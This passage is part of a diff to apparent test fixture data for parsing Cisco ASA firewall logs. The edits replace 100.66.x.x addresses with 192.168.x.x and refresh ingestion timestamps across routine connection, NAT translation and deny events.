"mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11782", "source_interface": "outside", "mapped_destination_port": 1456 @@ -4755,8 +4755,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4791,7 +4791,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4800,8 +4800,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164716100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995068600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4817,7 +4817,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.100.4", + "mapped_source_ip": "192.168.100.4", "connection_id": "11783", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4839,8 +4839,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4875,7 +4875,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4885,8 +4885,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164725100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:33:41.995074900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4918,8 +4918,8 @@ }, "destination": { "port": 8270, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1457, @@ -4959,7 +4959,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4967,8 +4967,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164732Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270", + "ingested": "2021-12-09T13:33:41.995081200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5001,8 +5001,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5037,7 +5037,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5046,8 +5046,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164738900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", + "ingested": "2021-12-09T13:33:41.995087600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5063,7 +5063,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11784", "source_interface": "outside", "mapped_destination_port": 1457 @@ -5080,8 +5080,8 @@ }, "destination": { "port": 8271, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1458, @@ -5121,7 +5121,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5129,8 +5129,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164745Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271", + "ingested": "2021-12-09T13:33:41.995094100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5163,8 +5163,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5199,7 +5199,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5208,8 +5208,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164749800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", + "ingested": "2021-12-09T13:33:41.995100500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5225,7 +5225,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11785", "source_interface": "outside", "mapped_destination_port": 1458 @@ -5247,8 +5247,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5283,7 +5283,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5292,8 +5292,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164755400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995106700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -5309,7 +5309,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.1.107", + "mapped_source_ip": "192.168.1.107", "connection_id": "11786", "source_interface": "outside", "mapped_destination_port": 56132 @@ -5331,8 +5331,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5367,7 +5367,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5378,8 +5378,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.164763500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "ingested": "2021-12-09T13:33:41.995113Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5411,8 +5411,8 @@ }, "destination": { "port": 8272, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1459, @@ -5452,7 +5452,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5460,8 +5460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164771600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272", + "ingested": "2021-12-09T13:33:41.995119200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5494,8 +5494,8 @@ }, "source": { "port": 80, - "address": "100.66.198.40", - "ip": "100.66.198.40" + "address": "192.168.198.40", + "ip": "192.168.198.40" }, "tags": [ "preserve_original_event" @@ -5530,7 +5530,7 @@ "localhost" ], "ip": [ - "100.66.198.40", + "192.168.198.40", "172.31.98.44" ] }, @@ -5539,8 +5539,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164779900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", + "ingested": "2021-12-09T13:33:41.995125500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5556,7 +5556,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.198.40", + "mapped_source_ip": "192.168.198.40", "connection_id": "11787", "source_interface": "outside", "mapped_destination_port": 1459 @@ -5578,8 +5578,8 @@ }, "source": { "port": 53, - "address": "100.66.1.107", - "ip": "100.66.1.107" + "address": "192.168.1.107", + "ip": "192.168.1.107" }, "tags": [ "preserve_original_event" @@ -5614,7 +5614,7 @@ "localhost" ], "ip": [ - "100.66.1.107", + "192.168.1.107", "172.31.98.44" ] }, @@ -5624,8 +5624,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.164825Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", + "ingested": "2021-12-09T13:33:41.995132200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -5657,8 +5657,8 @@ }, "destination": { "port": 8273, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1460, @@ -5698,7 +5698,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5706,8 +5706,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164835500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273", + "ingested": "2021-12-09T13:33:41.995138500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5740,8 +5740,8 @@ }, "source": { "port": 80, - "address": "100.66.192.44", - "ip": "100.66.192.44" + "address": "192.168.192.44", + "ip": "192.168.192.44" }, "tags": [ "preserve_original_event" @@ -5776,7 +5776,7 @@ "localhost" ], "ip": [ - "100.66.192.44", + "192.168.192.44", "172.31.98.44" ] }, @@ -5785,8 +5785,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164841700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", + "ingested": "2021-12-09T13:33:41.995144200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -5802,7 +5802,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.192.44", + "mapped_source_ip": "192.168.192.44", "connection_id": "11788", "source_interface": "outside", "mapped_destination_port": 1460 @@ -5840,8 +5840,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164850400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995149800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -5866,8 +5866,8 @@ }, "destination": { "port": 8277, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1385, @@ -5907,7 +5907,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -5915,8 +5915,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164855200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277", + "ingested": "2021-12-09T13:33:41.995154500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -5949,8 +5949,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -5985,7 +5985,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -5994,8 +5994,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164860300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", + "ingested": "2021-12-09T13:33:41.995159900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6011,7 +6011,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.19.254", + "mapped_source_ip": "192.168.19.254", "connection_id": "11797", "source_interface": "outside", "mapped_destination_port": 1385 @@ -6049,8 +6049,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164865800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995166300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6096,8 +6096,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164870700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995170900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6143,8 +6143,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164877500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995176200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6190,8 +6190,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164885500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995182500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6237,8 +6237,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164893400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995187600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6284,8 +6284,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164901200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30", + "ingested": "2021-12-09T13:33:41.995193Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -6315,8 +6315,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6351,7 +6351,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6362,8 +6362,8 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.164908400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "ingested": "2021-12-09T13:33:41.995197700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:29:31.000Z", @@ -6400,8 +6400,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6436,7 +6436,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.156.80" ] }, @@ -6447,8 +6447,8 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-10-06T20:55:00.164912500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "ingested": "2021-12-09T13:33:41.995203100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -6480,8 +6480,8 @@ }, "destination": { "port": 8278, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1386, @@ -6521,7 +6521,7 @@ ], "ip": [ "172.31.156.80", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -6529,8 +6529,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164918Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278", + "ingested": "2021-12-09T13:33:41.995209500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -6563,8 +6563,8 @@ }, "source": { "port": 80, - "address": "100.66.115.46", - "ip": "100.66.115.46" + "address": "192.168.115.46", + "ip": "192.168.115.46" }, "tags": [ "preserve_original_event" @@ -6599,7 +6599,7 @@ "localhost" ], "ip": [ - "100.66.115.46", + "192.168.115.46", "172.31.156.80" ] }, @@ -6608,8 +6608,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.164923200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", + "ingested": "2021-12-09T13:33:41.995215800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -6625,7 +6625,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.156.80", - "mapped_source_ip": "100.66.115.46", + "mapped_source_ip": "192.168.115.46", "connection_id": "11798", "source_interface": "outside", "mapped_destination_port": 1386 @@ -6647,8 +6647,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6682,7 +6682,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6691,8 +6691,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164927900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995222500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6728,8 +6728,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6763,7 +6763,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6772,8 +6772,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164933600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995229300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6809,8 +6809,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6844,7 +6844,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6853,8 +6853,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164938300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995235600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6890,8 +6890,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -6925,7 +6925,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -6934,8 +6934,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164943100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995241900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -6971,8 +6971,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7006,7 +7006,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7015,8 +7015,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164947200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995248200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7052,8 +7052,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7087,7 +7087,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7096,8 +7096,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164953100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny 